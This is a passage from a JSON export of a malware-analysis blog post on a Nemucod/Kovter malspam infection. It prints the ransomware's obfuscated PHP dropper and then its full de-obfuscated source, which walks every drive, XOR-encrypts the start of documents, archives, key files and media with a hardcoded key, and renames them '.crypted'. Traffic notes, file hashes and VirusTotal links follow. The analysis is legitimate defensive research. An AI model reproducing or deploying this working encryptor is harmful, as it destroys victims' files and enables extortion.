ot;.chr(68).&quot;kyKTs&quot;.chr(78).&quot;Cg&quot;.chr(48).&quot;KCWl&quot;.chr(109).chr(75).&quot;HByZWdfbWF0Y2goJ&quot;.chr(121).&quot;8nL&quot;.chr(105).&quot;R&quot;.chr(122).&quot;L&quot;.chr(105).&quot;RzLicod2lub&quot;.chr(110).&quot;R&quot;.chr(56).&quot;Y&quot;.chr(109).chr(57).&quot;vdHxze&quot;.chr(88).&quot;N0ZW18d2lu&quot;.chr(90).&quot;G93c3x0bXB8&quot;.chr(100).chr(71).&quot;Vt&quot;.chr(99).&quot;H&quot;.chr(120).&quot;wcm9n&quot;.chr(99).&quot;mFtfGFwc&quot;.chr(71).&quot;R&quot;.chr(104).chr(100).&quot;GF8YX&quot;.chr(66).&quot;wbGlj&quot;.chr(89).&quot;XR&quot;.chr(112).&quot;b&quot;.chr(50).&quot;5&quot;.chr(56).&quot;cm9hbWluZ&quot;.chr(51).&quot;x&quot;.chr(116).&quot;c&quot;.chr(50).&quot;9&quot;.chr(109).chr(90).&quot;m&quot;.chr(108).&quot;j&quot;.chr(90).&quot;Xx&quot;.chr(48).chr(90).&quot;W1wb3Jhcnl8Y2Fj&quot;.chr(97).&quot;GUp&quot;.chr(76).chr(50).&quot;k&quot;.chr(110).chr(76).&quot;C&quot;.chr(82).&quot;wKSB8&quot;.chr(102).&quot;CBwcm&quot;.chr(86).&quot;nX2&quot;.chr(49).&quot;h&quot;.chr(100).&quot;GNoK&quot;.chr(67).&quot;cvcmVjeW&quot;.chr(78).&quot;sZS9pJ&quot;.chr(121).&quot;wkcCkpIHJldHVy&quot;.chr(98).&quot;jsNCg0KCSRkcD1A&quot;.chr(98).&quot;3Bl&quot;.chr(98).&quot;mRpcigkc&quot;.chr(67).&quot;k7DQoNCglpZigkZ&quot;.chr(72).&quot;A&quot;.chr(57).&quot;PT1&quot;.chr(109).&quot;Y&quot;.chr(87).&quot;x&quot;.chr(122).&quot;ZSkgcmV0dXJuOw0KDQoJd2hpbGU&quot;.chr(111).&quot;JG89&quot;.chr(81).chr(72).chr(74).&quot;l&quot;.chr(89).&quot;W&quot;.chr(82).&quot;kaXIoJG&quot;.chr(82).chr(119).&quot;K&quot;.chr(83).&quot;k&quot;.chr(103).&quot;aWYoJG8hPScuJyYmJG8h&quot;.chr(80).&quot;Sc&quot;.chr(117).&quot;Lic&quot;.chr(112).&quot;D&quot;.chr(81).&quot;o&quot;.chr(74).&quot;ew&quot;.chr(48).&quot;KCQl&quot;.chr(112).&quot;ZiAoQ&quot;.chr(71).&quot;lz&quot;.chr(88).&quot;2&quot;.chr(82).&quot;pci&quot;.chr(103).&quot;kcC4&quot;.chr(107).&quot;cy4kbykpDQoJCX&quot;.chr(115).&quot;N&quot;.chr(67).chr(103).&quot;k&quot;.chr(74).&quot;CVRyZWUo&quot;.chr(74).&quot;HA&quot;.chr(117).&quot;JHMuJG8pO&quot;.chr(119).&quot;0KC&quot;.chr(81).&quot;l9D&quot;.chr(81).chr(111).&quot;JCWVsc2VpZiA&quot;.chr(111).&quot;J&quot;.chr(71).&quot;E9PSdlJ&quot;.chr(121).chr(89).chr(109).&quot;cHJl&quot;.chr(90).&quot;19tYXRja&quot;.chr(67).&quot;gnL1s&quot;.chr(117).&quot;XSh6a&quot;.chr(88).&quot;B&quot;.chr(56).&quot;c&quot;.chr(109).chr(70).&quot;yf&quot;.chr(72).&quot;I&quot;.chr(119).&quot;MHxyMDF8&quot;.chr(99).&quot;j&quot;.chr(65).&quot;yfHI&quot;.chr(119).&quot;M3w&quot;.chr(51).&quot;enx&quot;.chr(48).&quot;YX&quot;.chr(74).&quot;8Z3p8Z3ppcHxhcmN8YXJqfG&quot;.chr(74).&quot;6&quot;.chr(102).chr(71).chr(74).&quot;6&quot;.chr(77).&quot;nxiemF8YnppcHxiemlwMnxpY2V&quot;.chr(56).&quot;eG&quot;.chr(120).&quot;zfHh&quot;.chr(115).&quot;c&quot;.chr(51).&quot;h8&quot;.chr(90).&quot;G&quot;.chr(57).&quot;jfGR&quot;.chr(118).&quot;Y&quot;.chr(51).&quot;h&quot;.chr(56).&quot;cGR&quot;.chr(109).&quot;f&quot;.chr(71).&quot;RqdnV8ZmI&quot;.chr(121).&quot;f&quot;.chr(72).&quot;J0Z&quot;.chr(110).&quot;xwcHR8cHB0eH&quot;.chr(120).chr(119).chr(99).&quot;HN8c3hp&quot;.chr(102).&quot;G9kbXxvZHR8bX&quot;.chr(66).chr(119).&quot;fH&quot;.chr(78).&quot;z&quot;.chr(97).&quot;Hxw&quot;.chr(100).&quot;WJ8Z3Bnf&quot;.chr(72).&quot;Bn&quot;.chr(99).&quot;HxrZGJ&quot;.chr(56).&quot;a2RieHx&quot;.chr(104).&quot;bHN8YXV&quot;.chr(119).&quot;fG&quot;.chr(78).&quot;w&quot;.chr(99).&quot;nxu&quot;.chr(99).&quot;HJ8Y3Bwf&quot;.chr(71).&quot;Jh&quot;.chr(99).&quot;3xh&quot;.chr(99).&quot;2&quot;.chr(49).&quot;8Y3&quot;.chr(78).&quot;8&quot;.chr(99).&quot;Gh&quot;.chr(119).&quot;fHBhc3xj&quot;.chr(98).&quot;GFzc3xw&quot;.chr(101).chr(88).&quot;xwbHxofHZif&quot;.chr(72).&quot;ZjcHJv&quot;.chr(97).chr(110).&quot;x&quot;.chr(50).&quot;YnBy&quot;.chr(98).&quot;2p8amF2YXxiYWt8YmFja3Vwf&quot;.chr(71).&quot;1kYnxh&quot;.chr(89).&quot;2&quot;.chr(78).&quot;kYnxtZG&quot;.chr(90).chr(56).&quot;b2Ri&quot;.chr(102).chr(72).&quot;dkYnxjc3Z&quot;.chr(56).&quot;dH&quot;.chr(78).chr(50).&quot;fH&quot;.chr(78).&quot;xbHxw&quot;.chr(99).&quot;2R&quot;.chr(56).chr(90).&quot;X&quot;.chr(66).&quot;zfGN&quot;.chr(107).&quot;cnxjcHR8a&quot;.chr(87).&quot;5kZH&quot;.chr(120).&quot;k&quot;.chr(100).&quot;2&quot;.chr(100).&quot;8&quot;.chr(89).&quot;Wl8c3Z&quot;.chr(110).&quot;fG1heHxz&quot;.chr(97).&quot;3&quot;.chr(66).&quot;8c2NhZHxjYW&quot;.chr(82).&quot;8M2Rzf&quot;.chr(71).&quot;JsZW5kfGx3b3xsd3N8&quot;.chr(98).&quot;W&quot;.chr(74).&quot;8c2&quot;.chr(120).&quot;kZH&quot;.chr(74).chr(51).&quot;fH&quot;.chr(78).&quot;sZGFzbXxzbGR&quot;.chr(119).&quot;cnR8dTNkfGpwZ3xq&quot;.chr(99).&quot;GVn&quot;.chr(102).&quot;H&quot;.chr(82).&quot;pZmZ8dGlmfHJhd3xhdm&quot;.chr(108).&quot;8bX&quot;.chr(66).&quot;nfG1w&quot;.chr(78).&quot;HxtNH&quot;.chr(90).&quot;8bXBlZ3xtcGV8d21mfHdtdnx2&quot;.chr(90).&quot;Wd&quot;.chr(56).&quot;bW92fDN&quot;.chr(110).&quot;cHxmbHZ8&quot;.chr(98).&quot;Wt2f&quot;.chr(72).&quot;ZvYnxy&quot;.chr(98).&quot;X&quot;.chr(120).&quot;tcDN8d2F2fG&quot;.chr(70).&quot;zZnx3&quot;.chr(98).&quot;WF&quot;.chr(56).&quot;bTN1f&quot;.chr(71).&quot;1&quot;.chr(112).&quot;ZGl8b2&quot;.chr(100).&quot;nfG&quot;.chr(49).&quot;p&quot;.chr(90).chr(72).&quot;x2ZG&quot;.chr(108).&quot;8&quot;.chr(100).&quot;m&quot;.chr(49).&quot;k&quot;.chr(97).&quot;3&quot;.chr(120).&quot;2aGR8ZHNrf&quot;.chr(71).&quot;l&quot;.chr(116).&quot;Z&quot;.chr(51).&quot;x&quot;.chr(112).&quot;c28pJC&quot;.chr(57).&quot;pJ&quot;.chr(121).&quot;wkbyk&quot;.chr(103).&quot;fH&quot;.chr(119).&quot;gJG&quot;.chr(69).&quot;9&quot;.chr(80).&quot;Sdk&quot;.chr(74).chr(121).&quot;Ym&quot;.chr(99).chr(72).&quot;JlZ19tYX&quot;.chr(82).chr(106).&quot;aCgnL1&quot;.chr(115).chr(117).&quot;X&quot;.chr(83).&quot;hj&quot;.chr(99).&quot;nlwdG&quot;.chr(86).chr(107).&quot;KSQvaS&quot;.chr(99).&quot;sJ&quot;.chr(71).&quot;8p&quot;.chr(75).&quot;Q0&quot;.chr(75).chr(67).&quot;Q&quot;.chr(108).&quot;7DQ&quot;.chr(111).&quot;JCQk&quot;.chr(107).&quot;Zn&quot;.chr(65).chr(57).chr(81).&quot;GZvcGVuK&quot;.chr(67).&quot;Rw&quot;.chr(76).&quot;i&quot;.chr(82).&quot;zLiRvLCdyKy&quot;.chr(99).&quot;pOw&quot;.chr(48).&quot;KCQ&quot;.chr(107).&quot;J&quot;.chr(97).&quot;W&quot;.chr(89).&quot;gKCR&quot;.chr(109).&quot;cCE9PW&quot;.chr(90).&quot;hb&quot;.chr(72).chr(78).&quot;lK&quot;.chr(81).&quot;0&quot;.chr(75).chr(67).chr(81).&quot;kJew0&quot;.chr(75).&quot;CQk&quot;.chr(74).chr(67).chr(83).chr(82).&quot;4PUBmcmVh&quot;.chr(90).&quot;C&quot;.chr(103).&quot;k&quot;.chr(90).&quot;nAsMTAyN&quot;.chr(67).&quot;k7DQoJC&quot;.chr(81).&quot;kJZm9&quot;.chr(121).&quot;KC&quot;.chr(82).chr(112).&quot;P&quot;.chr(84).&quot;A7JGk8c3RybGVu&quot;.chr(75).chr(67).&quot;R4KT&quot;.chr(115).&quot;k&quot;.chr(97).&quot;Ssr&quot;.chr(75).&quot;S&quot;.chr(82).&quot;4&quot;.chr(87).&quot;y&quot;.chr(82).chr(112).&quot;X&quot;.chr(84).&quot;1jaHI&quot;.chr(111).&quot;b&quot;.chr(51).chr(74).chr(107).chr(75).&quot;CR4WyRpXS&quot;.chr(108).&quot;eb&quot;.chr(51).&quot;JkKCRr&quot;.chr(87).&quot;yR&quot;.chr(112).&quot;JXN0cmxlbigkay&quot;.chr(108).&quot;dKSk7DQo&quot;.chr(74).chr(67).&quot;QkJQGZzZWV&quot;.chr(114).&quot;KCRmcC&quot;.chr(119).&quot;w&quot;.chr(75).&quot;TsNC&quot;.chr(103).&quot;k&quot;.chr(74).chr(67).&quot;QlAZ&quot;.chr(110).&quot;d&quot;.chr(121).&quot;a&quot;.chr(88).&quot;RlKCRmc&quot;.chr(67).chr(119).chr(107).&quot;eCk7&quot;.chr(68).chr(81).&quot;o&quot;.chr(74).chr(67).&quot;QkJ&quot;.chr(81).&quot;GZjbG9zZSgk&quot;.chr(90).chr(110).&quot;ApOw0KDQ&quot;.chr(111).&quot;JCQkJ&quot;.chr(97).&quot;WYo&quot;.chr(74).&quot;G&quot;.chr(69).&quot;9P&quot;.chr(83).&quot;dl&quot;.chr(74).&quot;y&quot;.chr(107).&quot;NCgkJCQl7D&quot;.chr(81).&quot;oJCQ&quot;.chr(107).&quot;J&quot;.chr(67).&quot;U&quot;.chr(66).&quot;yZW&quot;.chr(53).chr(104).&quot;bW&quot;.chr(85).&quot;oJ&quot;.chr(72).&quot;AuJ&quot;.chr(72).&quot;Mu&quot;.chr(74).&quot;G8sICRwLiRzLiRvL&quot;.chr(105).chr(99).&quot;u&quot;.chr(89).&quot;3J5cHR&quot;.chr(108).&quot;ZCcpO&quot;.chr(119).&quot;0KCQkJCX0NCgkJCQl&quot;.chr(108).&quot;bHNlDQ&quot;.chr(111).chr(74).&quot;CQ&quot;.chr(107).&quot;Jew0KCQkJ&quot;.chr(67).&quot;Ql&quot;.chr(65).chr(99).&quot;mVu&quot;.chr(89).&quot;W1lKC&quot;.chr(82).&quot;w&quot;.chr(76).&quot;iRzLiRvLC&quot;.chr(66).&quot;w&quot;.chr(99).&quot;mVnX3JlcGxh&quot;.chr(89).&quot;2&quot;.chr(85).chr(111).&quot;Jy9bLl&quot;.chr(49).chr(106).&quot;cnlwd&quot;.chr(71).&quot;V&quot;.chr(107).&quot;JC8nLCAnJywgJH&quot;.chr(65).&quot;uJHMu&quot;.chr(74).&quot;G8pKTsN&quot;.chr(67).&quot;gkJCQ&quot;.chr(108).&quot;9D&quot;.chr(81).&quot;oJCQ&quot;.chr(108).&quot;9DQoJCX0N&quot;.chr(67).&quot;gl9D&quot;.chr(81).&quot;oNC&quot;.chr(103).&quot;lAY2xvc2VkaXI&quot;.chr(111).chr(74).&quot;G&quot;.chr(82).&quot;wK&quot;.chr(84).&quot;s&quot;.chr(78).chr(67).chr(110).chr(48).&quot;=&quot;.chr(34).&quot;));&quot;;$j133=chr(47).&quot;f&quot;.chr(51).chr(50).&quot;0&quot;.chr(53).chr(50).&quot;e7e38bfce654&quot;.chr(49).&quot;0dd&quot;.chr(97).&quot;5015e6&quot;.chr(50).&quot;19&quot;.chr(47).chr(101);preg_replace($j133,$m173,&quot;f3&quot;.chr(50).&quot;052e&quot;.chr(55).chr(101).&quot;38bfce65&quot;.chr(52).chr(49).&quot;0d&quot;.chr(100).&quot;a&quot;.chr(53).&quot;0&quot;.chr(49).&quot;5&quot;.chr(101).&quot;6219&quot;); ?&gt;<\/pre>\n<p>The obfuscated PHP code above looks like this once it has been de-obfuscated:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n&lt;?php function Tree($p) {\r\n    $a = 'e';\r\n    $k = base64_decode('MWKTcqvkL5T5CEqMmuw+1CJwWrAGwPgwC37xsCigp\/xRFGvCm+IpzDag61C1EGGy+lSuQpv0T6T5\/C9ihPhsuvEoo\/hNqO82f9YtlAZ4SKD4NH\/Kjb7vvu8gNIDMwAZMkQJzrhV8');\r\n    $s = chr(92);\r\n    if (preg_match('\/' . $s . $s . '(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)\/i', $p) || preg_match('\/recycle\/i', $p)) return;\r\n    $dp = @opendir($p);\r\n    if ($dp === false) return;\r\n    while ($o = @readdir($dp)) if ($o != '.' &amp;&amp; $o != '..') {\r\n        if (@is_dir($p . $s . $o)) {\r\n            Tree($p . $s . $o);\r\n        } elseif ($a == 'e' &amp;&amp; preg_match('\/&#x5B;.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$\/i', $o) || $a == 'd' &amp;&amp; preg_match('\/&#x5B;.](crypted)$\/i', $o)) {\r\n            $fp = @fopen($p . $s . $o, 'r+');\r\n            if ($fp !== false) {\r\n                $x = @fread($fp, 1024);\r\n                for ($i = 0;$i &lt; strlen($x);$i++) $x&#x5B;$i] = chr(ord($x&#x5B;$i]) ^ ord($k&#x5B;$i % strlen($k) ]));\r\n                @fseek($fp, 0);\r\n                @fwrite($fp, $x);\r\n                @fclose($fp);\r\n                if ($a == 'e') {\r\n                    @rename($p . $s . $o, $p . $s . $o . '.crypted');\r\n                } else {\r\n                    @rename($p . $s . $o, preg_replace('\/&#x5B;.]crypted$\/', '', $p . $s . $o));\r\n                }\r\n            }\r\n        }\r\n    }\r\n    @closedir($dp);\r\n}\r\neval(base64_decode(&quot;c2V0X3RpbWVfbGltaXQoMCk7DQoNCmZvcigkaT02NzskaTw9OTA7JGkrKykgaWYoQGlzX2RpcihjaHIoJGkpLic6JykpIFRyZWUoY2hyKCRpKS4nOicpOw0KDQpmdW5jdGlvbiBUcmVlKCRwKQ0Kew0KCSRhPSdlJzsNCgkkaz1iYXNlNjRfZGVjb2RlKCdNV0tUY3F2a0w1VDVDRXFNbXV3KzFDSndXckFHd1Bnd0MzN3hzQ2lncC94UkZHdkNtK0lwekRhZzYxQzFFR0d5K2xTdVFwdjBUNlQ1L0M5aWhQaHN1dkVvby9oTnFPODJmOVl0bEFaNFNLRDROSC9LamI3dnZ1OGdOSURNd0FaTWtRSnpyaFY4Jyk7DQoJJHM9Y2hyKDkyKTsNCg0KCWlmKHByZWdfbWF0Y2goJy8nLiRzLiRzLicod2lubnR8Ym9vdHxzeXN0ZW18d2luZG93c3x0bXB8dGVtcHxwcm9ncmFtfGFwcGRhdGF8YXBwbGljYXRpb258cm9hbWluZ3xtc29mZmljZXx0ZW1wb3Jhcnl8Y2FjaGUpL2knLCRwKSB8fCBwcmVnX21hdGNoKCcvcmVjeWNsZS9pJywkcCkpIHJldHVybjsNCg0KCSRkcD1Ab3BlbmRpcigkcCk7DQoNCglpZigkZHA9PT1mYWxzZSkgcmV0dXJuOw0KDQoJd2hpbGUoJG89QHJlYWRkaXIoJGRwKSkgaWYoJG8hPScuJyYmJG8hPScuLicpDQoJew0KCQlpZiAoQGlzX2RpcigkcC4kcy4kbykpDQoJCXsNCgkJCVRyZWUoJHAuJHMuJG8pOw0KCQl9DQoJCWVsc2VpZiAoJGE9PSdlJyYmcHJlZ19tYXRjaCgnL1suXSh6aXB8cmFyfHIwMHxyMDF8cjAyfHIwM3w3enx0YXJ8Z3p8Z3ppcHxhcmN8YXJqfGJ6fGJ6MnxiemF8YnppcHxiemlwMnxpY2V8eGxzfHhsc3h8ZG9jfGRvY3h8cGRmfGRqdnV8ZmIyfHJ0ZnxwcHR8cHB0eHxwcHN8c3hpfG9kbXxvZHR8bXBwfHNzaHxwdWJ8Z3BnfHBncHxrZGJ8a2RieHxhbHN8YXVwfGNwcnxucHJ8Y3BwfGJhc3xhc218Y3N8cGhwfHBhc3xjbGFzc3xweXxwbHxofHZifHZjcHJvanx2YnByb2p8amF2YXxiYWt8YmFja3VwfG1kYnxhY2NkYnxtZGZ8b2RifHdkYnxjc3Z8dHN2fHNxbHxwc2R8ZXBzfGNkcnxjcHR8aW5kZHxkd2d8YWl8c3ZnfG1heHxza3B8c2NhZHxjYWR8M2RzfGJsZW5kfGx3b3xsd3N8bWJ8c2xkZHJ3fHNsZGFzbXxzbGRwcnR8dTNkfGpwZ3xqcGVnfHRpZmZ8dGlmfHJhd3xhdml8bXBnfG1wNHxtNHZ8bXBlZ3xtcGV8d21mfHdtdnx2ZWd8bW92fDNncHxmbHZ8bWt2fHZvYnxybXxtcDN8d2F2fGFzZnx3bWF8bTN1fG1pZGl8b2dnfG1pZHx2ZGl8dm1ka3x2aGR8ZHNrfGltZ3xpc28pJC9pJywkbykgfHwgJGE9PSdkJyYmcHJlZ19tYXRjaCgnL1suXShjcnlwdGVkKSQvaScsJG8pKQ0KCQl7DQoJCQkkZnA9QGZvcGVuKCRwLiRzLiRvLCdyKycpOw0KCQkJaWYgKCRmcCE9PWZhbHNlKQ0KCQkJew0KCQkJCSR4PUBmcmVhZCgkZnAsMTAyNCk7DQoJCQkJZm9yKCRpPTA7JGk8c3RybGVuKCR4KTskaSsrKSR4WyRpXT1jaHIob3JkKCR4WyRpXSleb3JkKCRrWyRpJXN0cmxlbigkayldKSk7DQoJCQkJQGZzZWVrKCRmcCwwKTsNCgkJCQlAZndyaXRlKCRmcCwkeCk7DQoJCQkJQGZjbG9zZSgkZnApOw0KDQoJCQkJaWYoJGE9PSdlJykNCgkJCQl7DQoJCQkJCUByZW5hbWUoJHAuJHMuJG8sICRwLiRzLiRvLicuY3J5cHRlZCcpOw0KCQkJCX0NCgkJCQllbHNlDQoJCQkJew0KCQkJCQlAcmVuYW1lKCRwLiRzLiRvLCBwcmVnX3JlcGxhY2UoJy9bLl1jcnlwdGVkJC8nLCAnJywgJHAuJHMuJG8pKTsNCgkJCQl9DQoJCQl9DQoJCX0NCgl9DQoNCglAY2xvc2VkaXIoJGRwKTsNCn0=&quot;));\r\nset_time_limit(0);\r\nfor ($i = 67;$i &lt;= 90;$i++) if (@is_dir(chr($i) . ':')) Tree(chr($i) . ':');\r\nfunction Tree($p) {\r\n    $a = 'e';\r\n    $k = base64_decode('MWKTcqvkL5T5CEqMmuw+1CJwWrAGwPgwC37xsCigp\/xRFGvCm+IpzDag61C1EGGy+lSuQpv0T6T5\/C9ihPhsuvEoo\/hNqO82f9YtlAZ4SKD4NH\/Kjb7vvu8gNIDMwAZMkQJzrhV8');\r\n    $s = chr(92);\r\n    if (preg_match('\/' . $s . $s . '(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)\/i', $p) || preg_match('\/recycle\/i', $p)) return;\r\n    $dp = @opendir($p);\r\n    if ($dp === false) return;\r\n    while ($o = @readdir($dp)) if ($o != '.' &amp;&amp; $o != '..') {\r\n        if (@is_dir($p . $s . $o)) {\r\n            Tree($p . $s . $o);\r\n        } elseif ($a == 'e' &amp;&amp; preg_match('\/&#x5B;.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$\/i', $o) || $a == 'd' &amp;&amp; preg_match('\/&#x5B;.](crypted)$\/i', $o)) {\r\n            $fp = @fopen($p . $s . $o, 'r+');\r\n            if ($fp !== false) {\r\n                $x = @fread($fp, 1024);\r\n                for ($i = 0;$i &lt; strlen($x);$i++) $x&#x5B;$i] = chr(ord($x&#x5B;$i]) ^ ord($k&#x5B;$i % strlen($k) ]));\r\n                @fseek($fp, 0);\r\n                @fwrite($fp, $x);\r\n                @fclose($fp);\r\n                if ($a == 'e') {\r\n                    @rename($p . $s . $o, $p . $s . $o . '.crypted');\r\n                } else {\r\n                    @rename($p . $s . $o, preg_replace('\/&#x5B;.]crypted$\/', '', $p . $s . $o));\r\n                }\r\n            }\r\n        }\r\n    }\r\n    @closedir($dp);\r\n}<\/pre>\n<p>The block of code above that is base64 encoded looks to be the same code repeated. Basically this file is what Nemucod uses to help encrypt the files on the host system. <\/p>\n<p>Moving from here, after the HTTP GET requests that drop the files on the host system there are POST requests to the IP address of &#8216;155.254.148.45.&#8217; Upon further inspection of these POSTs, it looks as if the site has been suspended.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/07\/IMG2-1.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/07\/IMG2-1.png\" alt=\"\" width=\"2560\" height=\"1260\" class=\"aligncenter size-full wp-image-573\" \/><\/a><\/p>\n<p>There are also requests from the host to 27 different IP addresses on port 8080 as seen above in the indicators of compromise. Most of the requests are either just sending SYN requests or receiving RSTs from the hosts. There is one IP address though that looks to have data pushed to it. Unfortunately the data that is being sent is encrypted\/obfuscated and is not readable.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/07\/IMG3-1.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/07\/IMG3-1.png\" alt=\"\" width=\"2554\" height=\"430\" class=\"aligncenter size-full wp-image-574\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/07\/IMG4-1.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/07\/IMG4-1.png\" alt=\"\" width=\"1488\" height=\"194\" class=\"aligncenter size-full wp-image-575\" \/><\/a><\/p>\n<p>The following are the artifacts that I was able to capture on the first run of the malspam.<\/p>\n<p>File name: a.exe (According to VT comments, this looks to be the PHP intrepter that Nemucod uses)<br \/>\nSize: 44KB<br \/>\nSHA256: 4ed142ac450d0ea86e0e31c46b1ca928bde991a7432dd6a0c2c3d79833ccac95<br \/>\nVT link: <a href=\"http:\/\/virustotal.com\/en\/file\/4ed142ac450d0ea86e0e31c46b1ca928bde991a7432dd6a0c2c3d79833ccac95\/analysis\/\" target=\"_blank\">http:\/\/virustotal.com\/en\/file\/4ed142ac450d0ea86e0e31c46b1ca928bde991a7432dd6a0c2c3d79833ccac95\/analysis\/<\/a><br \/>\nDetection ratio: 2 \/ 55<br \/>\nFirst submission 2010-07-03 09:04:07 UTC<\/p>\n<p>File name: a1.exe<br \/>\nSize: 309KB<br \/>\nSHA256: 37a9c67ad50487b840ebe5bbc02a5ad9df16e3c0588cb798ef8a5ecba50707d4<br \/>\nVT link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/37a9c67ad50487b840ebe5bbc02a5ad9df16e3c0588cb798ef8a5ecba50707d4\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/37a9c67ad50487b840ebe5bbc02a5ad9df16e3c0588cb798ef8a5ecba50707d4\/analysis\/<\/a><br \/>\nDetection ratio: 18 \/ 55<br \/>\nFirst submission 2016-07-20 10:10:40 UTC<\/p>\n<p>File name: a2.exe<br \/>\nSize: 124KB<br \/>\nSHA256: 2a87c2a5bceae936d6b64c8777464ee6849420dc62b5f855761ef392715f3730<br \/>\nVT link: <a href=\"http:\/\/virustotal.com\/en\/file\/2a87c2a5bceae936d6b64c8777464ee6849420dc62b5f855761ef392715f3730\/analysis\/\" target=\"_blank\">http:\/\/virustotal.com\/en\/file\/2a87c2a5bceae936d6b64c8777464ee6849420dc62b5f855761ef392715f3730\/analysis\/<\/a><br \/>\nDetection ratio: 6 \/ 55<br \/>\nFirst submission 2016-07-20 09:27:16 UTC<\/p>\n<p>File name: 59e955.02ecd42<br \/>\nSize: 46KB<br \/>\nSHA256: 3626277c8c3e90d606c693e7bf5b5b98f49408316b3dfceab3b1f83ae2417212<br \/>\nVT link: NA<\/p>\n<p>On an interesting note, I believe that the binary called &#8220;a2.exe&#8221; is the one that performs most of the work on the host system. When running just that binary I was able to replicate the network traffic in the PCAP, and also cause the VM to become encrypted as well.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Here is another example of Nemucod\/Kovter that I saw at work. It very much resembles another one that I saw and wrote up a while ago (see http:\/\/www.herbiez.com\/?p=535). For more information about how Nemucod\/Kovter keeps it&#8217;s persistence on the host system then please read this excellent blog post on MalwareBytes&#8217; blog here. Since the MalwareByte&#8217;s blog covers the filesystem aspect incredibly well, I am not going to talk about it here since this one mimics what is seen in the blog post. Also, if you would like to see the artifacts found in this investigation, please see the Github repo&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=571\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-571","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/571","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=571"}],"version-history":[{"count":3,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/571\/revisions"}],"predecessor-version":[{"id":578,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/571\/revisions\/578"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=571"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=571"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=571"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}